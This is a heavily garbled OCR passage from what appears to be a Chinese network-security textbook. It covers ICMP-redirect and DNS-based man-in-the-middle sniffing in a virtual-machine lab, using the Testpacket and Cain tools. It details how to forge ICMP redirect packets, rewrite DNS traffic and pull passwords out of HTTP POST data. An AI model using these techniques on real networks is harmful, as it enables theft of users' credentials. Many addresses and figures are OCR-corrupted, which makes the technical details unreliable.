9.56.56.c9. 9. 1 一 一 自动 获得 被 攻击 主机 MAC 


图 7-24 Testpacket 软件 的 使 用 


192. 168. 111. 4 ,攻击 软 件 会 自动 获取 攻击 机 的 MAC 地 址 并 显示 出 来 。 在 本 例 中 攻击 机 
的 MAC 地 址 为 00-0c-29-fe-b9-85。 

接 下 来 软件 提示 input gateway ipaddr: 要 求 输入 网 关 的 IP 地 址 ,这 里 输入 192. 
168. 111.1, 软 件 使 用 ARP 自动 获取 网 关 的 MAC 地 址 并 显示 出 来 。 在 本 例 中 网 关 的 
MAC 地 址 为 00-0c-29-5c-7e-7b。 

软件 提示 input internet host ipaddr: 这 里 要 求 输入 外 网 主机 即 PC2 的 IP 地址 10. 
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网 络 安全 基础 
1. 1.2。 最 后 软件 提示 input redirect host ipaddr: 要 求 输入 被 攻击 主机 即 PC1 的 IP 地 
址 ,这 里 输入 192. 168. 111. 3, 软 件 使 用 ARP 自动 获取 PC1 的 MAC 地 址 并 显示 出 来 。 
在 本 例 中 ,PC1 的 MAC Nt 00-50-56-c0-00-01。 


每 隔 1s 向 PC1 发 送 一 


POY en 7- 
示 发 往 PC2 的 数据 报 转发 给 晴 


Active Routes: 
Network Destination 
9.9.9.9 
.11T 
127.0.0.0 
192.168.111.0 


192.168.111. 


192.168.111 


224.0.0. 
255.255.255.255 


Default Gatewa 


第 四 步 : 在 了 H 
cain 可 以 自动 提取 


网 卡 , 如 图 7-26 所 示 。 


之 后 使 cain 处 于 


取出 敏感 


信息 。 
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监听 状态 (图 7-27) 
的 所 有 数据 报 , 其 中 就 包含 


之 后 Testpacket 进入 稳定 工作 状态 ， 
ICMP 重 定向 报 文 ,并 负责 中 转 PC1 发 给 PC2 的 通信 数据 。 
25 所 示 , 可 见 在 默认 路 由 之 前 出 现 了 一 条 特定 主机 路 由 , 它 表 


acker。 


[Ro 


定向 路 由 


Netmask 
9.9.9.9 
255.255.255.255 
255.0.0.0 
255.255.255.0 
255.255.255.255 
255.255.255.255 
240.0.0.0 
255.255.255.255 
192.168.111.1 


图 7-25 


Interface 
168.111 . 
.168 . 


PC1 的 路 由 表 


acker 主机 使 用 cain 进行 数据 监听 。 


出 通信 数据 中 包含 的 账户 、 密 码 信息 ,首先 需要 为 cain 选 定 工作 


Configuration Dialog 


Filters and ports | HITP Fields 
Traceroute | Certificate Spoofing 
Sniffer | AFR ( Arp Poison Routing ) | Challenge Spoofing 
Adapter IP address Subnet Mask 


192. 168. 111.4 255. 255. 255.1 


Winpeap Yersion 
4.1.0.1753 IN 


Current Network Adapter 
\Device\NPF_{1E8A4568-3209-4832-92D5-B97523DBB718} 


WARNING 1!! Only ethernet adapters supported 
Options 

厂 Start Sniffer on sl [ Don' t use Proniscuous mode 
厂 Start APR on star 


确定 取消 帮助 
图 7-26 选 定 网 卡 


。 这 时 cain 


会 自动 捕获 经 过 Hacker 主机 网 卡 
PC1 发 送 给 PC2 的 通信 数据 ,cain 会 自动 从 捕获 数据 中 提 
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Vi Cenfigare Tools lelp 
监听 状态 一 上 宰 史 四 [Ws 开罗 | 
Decoders [@ mtvork T 


| 有 Cached Passwords 


| 


EF ss 便 ments [EL ED [ees 区 


Protected Storage Press the + button on the toolbar to dunp the Protected Storage 
LS Secrets 
fireless Passwords 
IPT Passwords 
Windows Nail Passwords 
本] Dialup Passwords 
fe Edit Boxes 
Enterprise Nanager 
四 credential manager 图 


Protected Storage 


Lost packets: _O% 


图 7-27 使 cain 处 于 监听 状态 
第 五 步 : 在 PC1 登录 PC2 上 的 “电子 商务 ”站 点 。 


在 PC1 登录 PC2 上 的 “电子 商务 ”站 点 ,受害 者 输入 的 账户 和 密码 数据 会 被 封装 成 一 


个 IP 数 据 报 提交 给 Hacker,cain 会 捕获 这 个 报 文 并 从 中 提取 出 账户 信息 ,如 图 7-28 和 
图 7-29 所 示 。 


rs Internet Explorer 

Fr 

GO- Ee 0 4.2 

文件 四 ”编辑 于) 查看 中 收藏 来) 工具 加 帮助 吧 


突 收藏 天 | 鹤 目 ] 过 FS ” 目 ] 免费 Hotasil 用 | 同 而 纪 识 军 ~ 
et 


Www wnaniaorT cow 


〇 产 &6 傈 朱林 天 汪 时 大 是 吧 咱 四 现在 的 时 间 是 2012-11-8 14:01 .39 


输入 账户 、 密 码 
[查看 信息 了 
【购买 商品 
TCM 次 站 : 173 iat: 165) 


国 |@jltjlx| | 多 
文件 中， 贞 得 四 查 看 人 收 庆 天) 工具 CD 于 助 0 

人 斌 收 瑟 天 | 例 国 尘 MFRS -加 和 有 Joteuil 下 NE - 
2 


侩 ~ 口 时 ”页面 中 ”安全 申 I 具 吊 - 移 - ” 


习 


【次数 : 17] 


【浏览 次 汐 : 165】 


图 7-29 登录 成 功 
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六 步 : 在 Hacker 上 查看 截获 的 账户 。 
Hacker 上 查看 截获 的 账户 ,结果 如 图 7-30 所 示 。 


屠 流 


Hile Vier Configure Tools kelp 

| 外 @ 尺 史册 | 十 写 | 辐 |% 和 DO 四国 加 晶 轨 OF? 

本 Decoders [ Weworr [ 哆 sniteer [7 Cracker [@ traceroute [加 con TY miraess [BW vey | 
ssvords 


sernane | Passwor: 


http://10.1.1.2/index. asp 
http:7A10.1.1.27index .asp 


mb SB (1) 
国 Telnet 0) 


截获 的 账户 信息 
图 7-30 在 Hacker 上 查看 截获 的 账户 


3 ”基于 DNS 协议 和 ICMP 重 定向 的 数据 
监听 方法 


数据 监听 是 指 捕 获 、 分 析 网 络 中 其 他 主机 传输 的 数据 包 , 从 中 提取 出 敏感 信息 。 在 交 
换 式 网 络 内 ,通常 使 用 ARP 欺骗 实施 数据 监听 。 但 随 着 360 防火 墙 .ARP 静态 绑 定 、 交 
换 机 端口 绑 定 等 措施 的 采用 ,这 种 方法 受到 有 效 限 制 。 近 年 来 ,基于 ICMP 重 定向 的 数据 
监听 方法 成 为 研究 的 热点 ,这 种 方法 不 受 ARP 欺骗 防护 措施 的 限制 ,可 在 交换 式 网 络 内 
实施 数据 监听 

攻击 者 通过 发 送 ICMP 重 定向 报 文 可 以 在 受害 者 主机 路 由 表 中 添加 一 条 到 达 特 定 主 
机 的 路 由 信息 ,使 得 受害 者 发 往 特 定 主机 的 数据 包 被 发 往 攻击 者 主机 ,进而 攻击 者 可 以 从 
提取 出 敏感 信息 ,如 聊天 记录 、 账 户 数据 。 图 7-31 为 在 受害 者 主机 上 查看 到 的 路 由 信 
息 ,第 一 条 为 正常 的 默认 路 由 , 它 的 优先 级 最 低 , 当 其 他 路 由 信息 都 不 匹配 时 ,主机 会 使 用 
这 条 路 由 将 数据 包 转发 给 网 关 (192. 168. 111. 4) 。 第 二 条 是 攻击 者 添加 的 到 达 10.1.1.1 
这 台 特 定 主机 的 路 由 信息 , 它 的 优先 级 高 于 默认 路 由 。 受 害 者 发 往 10. 1. 1. 1 的 数据 将 发 
送 给 192. 168. 111. 1 即 攻击 者 主机 ,攻击 者 从 报 文中 提取 出 敏感 信息 之 后 ,再 将 它 转发 给 
网 关 。 这 样 一 来 ,在 受害 者 没有 察觉 的 情况 下 ,攻击 者 成 为 通信 和 的“ 中间人”。 


5 C:\WINDOY¥S\systen32\cnd. exe 


Network Destination Netmask Gateway Interface Metric 


9.9.9.9 9.9.9.9 192.168.111.4 “192.168.111.3 19 
19.1.1.1 255.255.255.255 192.168.111.1 192.168.111.3 1 


图 7-31 特定 主机 路 由 
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但 这 种 方法 需要 预先 通过 ICMP 重 定向 报 文 将 特定 主机 路 由 信息 添加 到 受害 者 主机 
路 由 表 中 ,在 无 法 预知 特定 主机 IP 地 址 的 情况 下 ,这 种 方法 不 能 应 用 。 为 了 解决 这 个 问 
题 ,本 文 研究 基于 DNS 协议 和 ICMP 重 定向 的 数据 监听 方法 。 


ae 基于 DNS 协议 和 ICMP 重 定向 的 数据 监 了 听 流 程 


主机 在 进行 网 络 通信 时 (如 浏览 主页 ,收发 邮件 ) ,首先 向 DNS 服务 器 发 送 一 个 请 求 
报 文 ,请求 将 目标 主机 的 域名 解析 为 IP 地 址 ,在 DNS 服务 器 返回 的 应 答 报 文中 包含 目标 
主机 的 多 个 IP 地 址 ,之 后 主机 会 选择 一 个 IP 地 址 与 目标 主机 通信 。 

基于 DNS 协议 和 ICMP 重 定向 的 数据 监听 流程 见 图 7-32 所 示 ,整个 攻击 流程 可 以 
分 为 三 个 环节 : 四 对 客户 机 进行 ICMP 重 定向 攻击 ,在 客户 机 路 由 表 中 添加 一 条 到 达 
DNS 服务 器 的 主机 路 由 ,其 中 下 一 跳 路 由 器 为 黑客 主机 ; 四 黑客 主机 截获 并 转发 DNS 
数据 报 , 根 据 DNS 应 答 数据 报 中 的 IP 地 址 对 客户 主机 实施 多 次 ICMP 重 定向 攻击 ,将 到 
达 这 些 IP 的 下 一 跳 路 由 器 均 指向 黑客 主机 ; @ 黑 客 主机 截获 、 转 发 客户 机 收发 的 IP 数 
据 报 , 从 中 提取 出 敏感 信息 (如 账户 、 密 码 )。 下 面具 体 介绍 重点 环节 。 


client hacker dns server web server 
icmp redirect 
dns request 
dns request 
dns reply 
icmp redirect 
dns reply 
ip datagram 
ip datagram 
一 | 
ip datagram 
一 
ip datagram 


1 1 1 
图 7-32 ICMP 重 定向 攻击 步 又 


752 通过 ICMP 重 定向 在 受害 者 主机 中 添加 到 达 DNS 服务 
器 的 路 由 信息 


构造 一 个 ICMP 重 定向 报 文 发 给 受害 者 主机 ,在 受害 者 主机 路 由 表 中 添加 一 条 到 达 
DNS 和光 站 由 信息 其 中 下 一 跳 路 由 器 为 黑客 主机 ,这 样 一 来 ,受害 者 发 出 的 DNS 
请 求 报 文 将 被 提交 给 黑客 主机 。ICMP 重 定向 报 文 如 图 7-33 所 示 , 这 个 数据 包 共 70 字 
节 , 由 14 字 节 的 链 路 层 数 据 、20 字 节 的 IP 首部 ,8 字 节 的 ICMP 首部 、20 字 节 的 伪造 IP 
首部 和 8 字 节 的 附加 数据 组 成 。 

在 链 路 层 数据 中 ,目的 MAC 地址 是 受害 者 主机 MAC 地 址 , 源 MAC 地 址 是 攻击 者 
主机 MAC 地 址 。 此 处 源 MAC 地 址 不 伪造 成 网 关 的 MAC 地 址 是 为 了 不 破坏 交换 机 的 
MAC 地 址 表 。 

因为 网 络 内 的 主机 只 信任 网 关 发 出 的 ICMP 重 定向 报 文 ,攻击 者 需要 伪造 网 关 向 受 
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victim MAC | 5 | 1 | check 
hacker MAC hacker IP 
pe 20B 个 20B 
Link data IP header forge IP header remainder data 
14B UL 8B UL 8B 
length length 
id flag id flag 
check check 
gateway ip Victim ip 
victim ip DNS server ip 


图 7-33 ICMP 重 定向 报 文 


害 者 发 送 这 个 ICMP 重 定向 报 文 ,因此 在 IP 首部 中 , 源 IP 地 址 设置 为 网 关 的 IP 地 址 ,这 
样 一 来 ,受害 者 会 误 认 为 这 个 ICMP 重 定向 报 文 来 自 默认 网 关 , 进 而 信任 这 个 报 文 携带 的 
重 定向 信息 。 目 的 IP 地 址 设置 为 受害 者 主机 的 IP 地 址 。length 字段 值 为 56。 对 IP 首 
部 20 字 节 计算 校 验 和 填 人 check 字段 。 

构造 8 字 节 ICMP 首部 ,第 1 字 节 是 ICMP 类 型 字段 ,5 代表 这 是 一 个 ICMP 重 定向 
报 文 。 第 2 字 节 是 代码 字段 ,1 代表 这 是 一 个 重 定向 主机 数据 报 。 第 3、4 字 节 是 校 验 和 
字段 , 校 验 范围 包括 ICMP 首部 开始 的 36 个 字 节 数据 。 第 5 一 8 字 节 是 新 的 网 关 地址 ,这 
里 填 为 攻击 者 主机 的 IP 地 址 。 受 害 者 会 将 这 个 IP 地 址 作为 新 的 默认 网 关 。 

构造 20 字 节 假 IP 首部 ,其 中 源 IP 地 址 设置 为 受害 者 主机 IP、 目 的 IP 地 址 为 DNS 
服务 器 IP。 其 后 是 8 字 节 附加 数据 ,这 8 字 节 数据 按照 ICMP 首部 格式 构造 。 这 样 一 
来 ,受害 者 会 误 认为 这 28 字 节 数据 来 自 自己 发 给 DNS 服务 器 的 某 个 ICMP 数据 包 。 进 
而 在 自己 的 路 由 表 中 添加 一 条 到 DNS 服务 器 的 路 由 信息 ,其 中 下 一 跳 地 址 设置 为 黑客 主 
机 IP 地 址 。 


7.53 截获 并 转发 DNS 数据 报 


下 面 以 受害 者 浏览 www. shou. com 主页 为 例 进行 说 明 。 由 于 攻击 者 已 经 预先 在 受 
害 者 主机 路 由 表 中 添加 了 一 条 到 DNS 服务 器 的 路 由 信息 ,因此 受害 者 主机 发 给 DNS 服 
务 器 的 请 求 报 文 被 提交 给 黑客 主机 ,黑客 重新 封装 该 报 文 之 后 ,将 它 转发 出 去 。 转 发 出 去 
的 数据 包 如 图 7-34 所 示 。 

报 文 包括 14 字 节 链 路 层 数据 .20 字 节 IP 数据 、8 字 节 UDP 数据 、12 字 节 DNS 首部 
和 可 变 长 度 的 DNS 数据 。 

在 链 路 层 数据 中 ,目的 MAC 地 址 修改 为 网 关 的 MAC 地 址 、 源 MAC 地 址 改 为 黑客 
主机 的 MAC 地 址 ,使 得 该 报 文 可 以 通过 交换 机 正常 传递 给 网 关 。 

在 JP 数据 中 , 源 IP 地 址 由 受害 者 IP 改 为 黑客 IP, 这 样 一 来 ,DNS 服务 器 会 将 应 答 
报 文 返回 给 黑客 主机 ,否则 DNS 应 答 报 文 会 直接 返 给 受害 者 。 重 新 计算 IP 首部 20 字 节 
校 验 和 , 填 和 人 check 字段 。UDP 和 DNS 数据 不 进行 任何 修改 。 
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gateway MAC d-port www.sohu.com 
hacker MAC check 0x01 0x01 


人 


Link data 


DNS question 


14B UL 8B UL nB 
length id flag 
id flag Q-count A-cont 
check 0x00 0x00 
hacker ip 
DNS server ip 


图 7-34 转发 的 DNS 请 求 报 文 


DNS 服务 器 收 到 这 个 请 求 报 文 , 会 认为 这 是 黑客 主机 在 请 求 查询 www. sohu. com 
域名 对 应 的 IP 地 址 ,于 是 将 DNS 应 答 报 文 返回 给 黑客 主机 ,如 图 7-35 所 示 。 在 该 应 答 
报 文 的 DNS 数据 部 分 携带 了 sohu 服务 器 的 两 个 可 用 IP 地 址 , 即 61. 135. 131. 183 和 61. 
135. 132. 65。 黑 客 根据 这 两 个 IP 地 址 构造 两 个 ICMP 重 定向 报 文 发 送 给 受害 者 ,在 受害 
者 主机 路 由 表 中 添加 两 条 到 这 两 个 IP 地 址 的 主机 路 由 ,下 一 跳 地 址 均 设置 为 黑客 主机 
IP。 这 样 一 来 ,不 管 受 害 者 选择 哪个 IP 地 址 与 sohu 服务 器 通信 ,其 收发 的 数据 报 都 会 经 
过 黑客 主机 中 转 。 


Www.sohu.com > 
question 
0x01 0x01 
name-ptr 0x01 
0x01 0x00 first 
TTL 0x04 Se 
61.135.131.183 
name-ptr 0x01 
0x01 0X00 Second 
hacker MAC TTL 0x04 | | answer 
gateway MAC 61.135.132.65 


个 20B 个 


Link data IP header DNS data 
14B UL nB 
length 
id flag 
check 
DNS server ip 
hacker ip 


图 7-35 DNS 应 答 报 文 
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接 下 来 ,黑客 重新 封装 这 个 DNS 应 答 报 文 发 送 给 受害 者 。 目 的 MAC 地 址 修改 为 受 
害 者 主机 MAC , 源 MAC 地 址 修改 为 黑客 主机 MAC, 目 的 IP 地 址 修改 为 受害 者 IP ,重新 
计算 IP 首部 20 字 节 校 验 和 , 填 入 check 字段 。 


7.54 ”监听 通信 数据 \ 提 取 敏感 信息 


受害 者 接收 到 DNS 应 答 报 文 后 会 从 中 选择 一 个 IP 地 址 与 目标 主机 通信 ,由 于 黑客 
已 经 预先 在 受害 者 主机 路 由 表 中 添加 了 达到 目标 主机 的 特定 路 由 ,并 将 下 一 跳 路 由 器 指 
定 为 自己 的 IP 地址。 这 样 一 来 ,受害 者 发 给 目标 主机 的 通信 数据 都 被 提交 给 黑客 主机 ， 
黑客 可 以 从 中 提取 出 账户 、 密 码 等 敏感 信息 。 

用 户 在 登录 自己 的 邮箱 ,论坛 、 微 博 、 网 银 时 ,都 需要 在 网 页 内 输入 账户 和 密码 ,输入 
的 敏感 信息 会 被 封装 在 一 个 特定 的 报 文 内 发 送出 去 。 截 获 这 个 数据 报 ,并 从 中 提取 出 敏 
感 信息 是 黑客 最 为 关心 的 一 件 事情 。 图 7-36 给 出 的 是 黑客 主机 截获 的 包含 受害 者 账户 、 
密码 的 登录 数据 报 。 这 类 报 文 包括 14 字 节 链 路 层 数据 、20 字 节 IP 数据 .20 字 节 TCP 数 
据 和 多 个 字 节 的 HTTP 数据 。 如 何 从 中 转 的 海量 数据 报 中 准确 识别 出 包含 敏感 信息 的 
报 文 呢 ? 通过 大 量 实验 发 现 , 敏 感 信息 通常 使 用 POST 方法 发 送 , 即 数据 报 的 HTTP 数 
据 部 分 前 4 个 字 节 是 “POST” ,根据 这 个 条 件 可 以 将 包含 敏感 信息 的 报 文 过 滤 出 来 。 


s-port d-port 
seq number 
ack unmber 
hacker MAC flag window 
个 20B 个 nB 
Link data IP header T 
| 
14B 0 20B J 
length POST/login.asp 一 一 request line 
head 
check i 
victim ip 一 一 blank line 
target ip user=xgt&pass=ab 一 一 entity 


图 7-36 截获 的 卫 数据 报 


确定 了 包含 敏感 信息 的 通信 报 文 , 接 下 来 如 何 从 该 数据 报 中 提取 出 敏感 信息 呢 ? 通 
过 大 量 实验 发 现 , 敏 感 信息 通常 包含 在 HTTP 数据 的 content 部 分 。 这 部 分 内 容 包含 在 
HTTP 数据 的 尾部 ,并且 content 与 上 一 项 内 容 之 间 存 在 一 个 空 行 ,使 用 Sniffer 查看 , 即 
存在 两 个 字 节 0x0a 和 0x0d, 分 别 代 表 回 车 和 换行 。 以 此 为 条 件 就 可 以 提取 出 content 数 
据 , 即 从 HTTP 数据 的 尾部 开始 向 前 读 取 , 当 识别 出 0x0a 和 0x0d 时 识别 结束 ,将 这 部 分 
内 容 保存 下 来 ,其 中 就 包含 敏感 信息 。 
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7 。 基于 DNS 协议 和 ICMP 重 定向 的 数据 监 


76.1 测试 环境 


测试 环境 如 图 7-37 所 示 。 本 机 作为 攻击 者 对 受害 者 实施 数据 监听 , 它 的 IP 地 址 为 
192. 168. 111. 1,MAC 地 址 为 00-50-56-C0-00-01。Windows XP 虚拟 机 1 作为 受害 者 , 它 
的 IP 地 址 为 192. 168. 111. 3, MAC 地 址 为 00-0C-29-FE-B9-85 ,注意 受害 者 与 攻击 者 需 
要 处 于 同一 网 段 。Windows XP 虚拟 机 2 作为 Web 服务 器 ,其 上 运行 “中 网 景 论坛 ”, 它 
的 IP 地址 为 10. 1. 1. 2,MAC 地 址 为 00-0C-29-D8-72-73。 使 用 Windows 2000 虚拟 机 作 
为 路 由 器 连接 10. 1. 1.0 和 192.168.111.0 网 络 , 其 上 行 接口 卫 地 址 为 10. 1. 1. 1,MAC 地 址 
为 00-0c-29-c3-5d-ed, 下 行 接口 IP 地 址 为 192. 168. 111. 4,MAC 地 址 为 00-0c-29-c3-5d-e3 , 同 
时 Windows 2000 虚拟 机 还 扮演 DNS 服务 器 的 角色 ,负责 解析 Web 服务 器 的 域名 信息 。 


Web 
服务 器 


Windows 器 10.1.1.2 
虚拟 机 2 00-0C-29-D8-72-73 


10.1.1.1 
00-0c-29-c3-5d-ed 攻击 者 
Windows 2000 虚 拟 机 DR 本 机 思 192.168.111.1 
192.168.111.4 00-50-56-CU-00-01 


00-0c-29-c3-5d-e3 


Windows XP 192.168.111.3 
虚拟 机 1 00-0C-29-FE-B9-85 


受害 者 
图 7-37 实验 环境 


762 测试 目的 

攻击 者 利用 DNS 协议 和 ICMP 重 定向 对 受害 者 实施 攻击 ,使 得 受害 者 与 Web 服务 
器 之 间 的 通信 数据 经 过 攻击 者 主机 中 转 ,攻击 者 从 中 转 的 数据 报 中 提取 出 受害 者 的 账户 、 
密码 。 

763 测试 步骤 


第 一 步 : 配置 各 个 对 象 的 地 址 信息 。 
以 host-only 方式 启动 两 台 Windows XP 虚拟 机 ,参照 图 7-37 配置 各 个 对 象 的 IP 地 
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址 ,注意 本 机 和 Windows XP 虚拟 机 1 的 网 关 设 置 为 192. 168. 111.4,DNS 服务 
Windows XP 虚拟 机 2 的 网 关 设 置 为 10. 1.1.1。 


~ 对象 的 配置 


Docunents and Settings\x9t>ipconfi9 /all 
IlWindows IP Configuration 


Host Nane . . . 
Primary Dns Suffix 
Node Type . Ee 
IP Routing Enabled. PS 
WINS Proxy Enabled. . 入 六、 泣 | 


Ethernet adapter 本 搂 2: 


Connection-specific DNS Suffix 
Description 

Physical hddress 

Dhcp Enabled. . . .. Re .No 
IP Address. 
Subnet Nask 
Default Gatewuay . 
DNS Seruers 


: ccpc-a6e3da4a51 


Unknonn 


. : UMware Uirtual Ethernet hdapter for UMnet1 
: 99-59-56-C9-99-61 


192.168.111.1 

255.255.255.9 

四 192.168.111.4 
: 19.1.1.1 


如 图 7-38 一 图 7 


C:\Documents and Settings\You>ipconfig /all 
Windows IP Configuration 


Host Name 
Primary Dns Suffix 
Node Type 
IP Routing Enabled 
WINS Proxy Enabled 


Ethernet adapter 本 地 i 


Connection-specific DNS Suffix 
Description 


Physical Address. 
Dhcp Enabled. 

IP hddress 
Subnet Mask 
Default Gateway . 
DNS Servers 


攻击 者 (本 机 ) 的 配置 信息 


xp 
Unknown 


No 
No 


UMware Accelerated AMD PCNet hdapter| 


99-9C-29-08-72-73 


: 255.255.255.9 


19.1.1.1 


1 1418.121.4 


Web 服务 器 (Windows X 


P 虚拟 机 2) 的 配置 信息 


Documents 
Windows IP Configuration 


Host Name 
Primary Dns Suffix 
Node Type 
IP Routing Enabled 
WINS Proxy Enabled 


Ethernet adapter 本 地 


Connection-specific DNS Suffix 
Description . 人 


Physical Address. 
Dhcp Enabled 

IP Address. 
Subnet Mask 
Default Gateway . 
DNS Servers 


and Settings\You>ipconfig /all 


: xp 
: Unknown 
: No 


No 


Wuare Accelerated AMD PCNet hdapter| 


: 99-9C-29-FE-B9-85 


No 


: 192.168.111.3 


255.255.255.0 
192.168.111.4 


3 


图 7-40 


受害 者 (Windows XP 虚拟 机 


1) 的 配置 信息 


名 设 汪 为 
-40 所 示 
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第 二 步 : 为 Windows 2000 虚拟 机 增加 一 块 网 卡 并 配置 地 址 。 

在 本 次 实验 中 ,Windows 2000 虚拟 机 扮演 路 由 器 ,因此 需要 为 其 添加 一 块 新 的 网 卡 。 
在 Windows 2000 虚拟 机 处 于 关闭 的 状态 下 , 单 击 虚拟 机 一 选择 “设置 "一 在 “硬件 ”选项 
卡 中 单 击 “ 添 加 ”按钮 一 选择 网卡 ”一 单 击 “ 添 加 ”按钮 。 启 动 Windows 2000 虚拟 机 ,在 
网 上 邻居 里 可 以 看 到 新 添加 的 网 卡 , 如 图 7-41 所 示 。 


| 文件 中 编辑 (四 查看) 收藏 A) 工具 (D 高 级 (JJ 帮助 四 EE 
- 由 | 人 @ 扫 索 同文 天 约克 | 语 玉 XX 只 | 国 - 
地 十 (6) | 名 网 络 和 技 号 连接 | 到 


bk 新 建 连接 。 染 地 连接 | 。 本 地 连接 2 
网 络 和 拨号 连接 习 
3 个 对 象 


图 7-41 Windows 2000 虚拟 机 新 添加 的 网 卡 


为 Windows 2000 虚拟 机 配置 IP 地 址 ,其 上 行 接口 IP 地 址 为 10. 1. 1.1, 下 行 接口 IP 
地 址 为 192. 168. 111. 4。 图 7-42 为 查看 到 的 Windows 2000 虚拟 机 地 址 信息 。 
CAWWINNT\System32Vcmd.exe 


Ethernet adapter 本 地 连接 2: 


Connection-specific DNS Suffix - : 
Description MD PCNET Fanily PCI Ethernet hd 


Physical Addr -8C-29-C3-5D-ED 
DHCP Enabled. 

IP Address. . . 

Subnet Mask . . 

Default Gatevay 

DNS Servers . . - 


Ethernet adapter 本 地 连接 : 


Connection-specific DNS Suffix - : 
Description MD PCNET Family PCI Ethernet hdl 


Physical Addr Es - 0-8C-29-C3-5D-E3 
DHCP Enabled. . - lo 

IP Addr 本 92.168.111.4 
Subnet ee 

Default teway 

DNS Servers . . - 


图 7-42 Windows 2000 虚拟 机 两 块 网 卡 的 配置 信息 


第 三 步 : 为 Windows 2000 虚拟 机 开启 RIP 路 由 功能 ,实现 网 络 间 的 通信 。 

本 次 实验 使 用 了 两 个 网 络 , 上 行 网 络 地 址 为 10. 1. 1. 0, 下 行 网 络 地 址 为 192. 168. 
111.0。 为 了 实现 两 个 网 络 的 连通 ,需要 在 Windows 2000 虚拟 机 上 开启 路 由 功能 ,这 里 
选择 RIP 实现 网 络 连通 。 

在 Windows 2000 虚拟 机 上 单 击 “ 开 始 ” 一 选择 “程序 ”一 单 击 “ 管 理工 具 ” 一 单 击 “ 路 
由 和 远程 访问 ”。 展 开 *IP 路 由 选择 ”一 右 击 “ 常 规 ” 一 选择 “新 路 由 选择 协议 ,用 于 
Internet 协议 的 RIP 版 本 2”, 之 后 在 列表 中 会 新 增 RIP 项 , 见 图 7-43。 

在 Windows 2000 虚拟 机 配置 RIP 路 由 之 后 .两 个 网 络 实现 了 连通 ,可 以 使 用 ping 
命令 测试 。 在 本 机 执行 ping 10. 1. 1.2, 结 果 见 图 7-44。 
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豆 路 由 和 远程 访问 

操作 (8) 查看 W || 全 浓 | 生 | 国 |X 多 加 | 多 
树 | RIP 

也 由 和 半 程 访问 接口 | 更 履 模式 | 发 送 的 响应 ”| 收 到 了 响应 | 


| 服务 器 状态 
四 CCPC-CMK58906BU (本 地 


盟 AppleTak 路 由 


由 站 远程 访问 记录 


图 7-43 在 Windows 2000 虚拟 机 开启 RIP 


:\Documents and SettingsN\xgt>ping 19.1.1.2 
Pinging 10.1.1.2 with 32 bytes of data: 


196.1.1.2: bytes:32 time<1ms TTL:127 
| TTLz127 
18.1.1.2t i TTL:127 
Reply from 10.1.1.2: bytes=32 time<ims TTL=127 


Ping statistics for 10.1.1.2: 

Packets: Sent : 4, Received : 4, Lost : 0 (6% loss), 
Approximate round trip times in milli-seconds: 

Minimum = Oms, Maximum = lms, Average - Oms 


D:\Documents and Settings\xgt> 


图 7-44 本 机 测试 结果 


第 四 步 : 在 Windows 2000 虚拟 机 上 开启 DNS 服务 功能 。 

在 Windows 2000 虚拟 机 上 开启 DNS 服务 功能 ,同时 将 Web 服务 器 的 配置 信息 添 
加 到 DNS 映射 表 中 。 在 Windows 200 pie = 单 击 “ 开 始 ” 一 选择 “程序 ”一 单 击 “ 管 理 
工具 ”一 单 击 DNS 习 右 击 “ 正 向 搜索 区 域 * 一 选择 “新 建 区 域 ”, 在 弹出 的 “新 建 区 域 向 导 ” 
中 尝 击 -下 一 步 " 控 钥 > 选择 “标准 主要 区 域 ” a 步 ? 按 钮 “输入 区 域名 称 ( 这 旦 
输入 ccpc. com) ,连续 单 击 “下 一 步 ? 按 钮 直至 完成 。 可 以 在 DNS 对 话 框 中 看 到 新 建立 
的 区 域 ,如 图 7-45 所 示 。 


旺 


| 访 控制 台 (C) ”窗口 () 必 助 由 
| 操作 (&) 查看 W || 千 省 | 向 | 加 | 关 认 加 园 | 包 


类 型 数据 
起 始 授权 机 构 [1], ccpc-cmks8906bu,, adm,,， 
名 称 服 务 器 ccpc-cmks6906bu， 


-日 ccpc-cMkss9068U 
日 图 下 


图 7-45 新 建立 的 ccpc. com 


A 
落 
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在 新 建立 的 ccpc. com 区 域 中 添加 主机 映射 ,将 Web 服务 器 的 域名 映射 为 其 IP 地 址 
10.1. 1. 2。 步 又 为 右 击 ccpc. com, 选择 “新 建 主 机 ”, 输 入 域名 和 IP 地 址 信息 ( 见 
图 7-46) , 单 击 “ 添 加 主机 ”按钮 。 


日 目 ccPc-cmkss906E 名称 如果 为 空 则 使 用 其 父 域名 称 ) 0D) - 
日 加 正 向 搜索 区 刀 [rw 


一 国 攻 ER 
加 反 向 搜索 区 二 TP 地 址 外 ); 
10 1 3 2 


厂 创 哇 相 关 的 指针 PTR) 记 录 CC) 


mmw] my | 


图 7-46 输入 域名 和 IP 地 址 信息 


在 DNS 窗口 中 可 以 看 到 新 建立 的 映射 记录 ,如 图 7-47 所 示 。 


| 这 控制 台 (C) 窗口 w) ” 才 助 (H) 
IE 


DNS 国 (与 父 文件 夹 相同 ) 起 始 授权 机 构 [1], ccpc-cmks6906bu， adm，， 
白 - 目 ccpc-cmkss9ocBu | 图 (与 父 文 件 夹 相同 ) 名 称 服务 器 。 ccpc-cmks8906bu， 
日 . 回 正 向 搜索 区 域 | 图 www 主机 10.1.1.2 


cpc.con 
四 -加 反 向 搜索 区 域 


图 7-47 新 添加 的 映射 记录 


第 五 步 : 测试 DNS 服务 器 功能 。 

在 Windows 2000 虚拟 机 开启 DNS 服务 功能 之 后 ,192. 168. 111. 0 网 段 内 的 主机 可 
以 使 用 www. ccpc. com 这 个 域名 与 Web 服务 器 通信 。 这 里 在 本 机 使 用 ping www. 
ccpc. com 命令 测试 ,结果 如 图 7-48 所 示 。 

第 六 步 : 在 Web 服务 器 上 安装 “中 网 景 论坛 ”。 

在 Web 服务 器 上 安装 “中 网 景 论坛 "网 站 ,首先 需要 确定 Web 服务 器 主 目录 的 位 置 , 
这 个 信息 可 以 在 IIS 服务 管理 器 中 查看 。 在 Web 服务 器 的 IIS 管理 器 中 右 击 “ 默 认 站 
点 ”, 选 择 “ 属 性 ”一 单 击 “ 主 目录 ”标签 ,在 本 地 目录 下 保存 该 网 站 的 主 目录 , 见 图 7-49。 
可 见 该 网 站 的 主 目录 为 e:\aaa 文件 夹 。 

确定 了 网 站 的 主 目录 为 e:Naaa 文件 夹 , 接 下 来 可 以 将 “中 网 景 论坛 ”的 源 代码 直接 放 
置 在 该 文件 夹 内 ,至 此 网 站 搭建 完成 ,可 在 远程 主机 测试 。 图 7-50 为 在 本 机 访问 “中 网 景 
论坛 ?的 测试 结果 。 
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D:\Documents and Settings\xgt>ping www.ccpc.com 


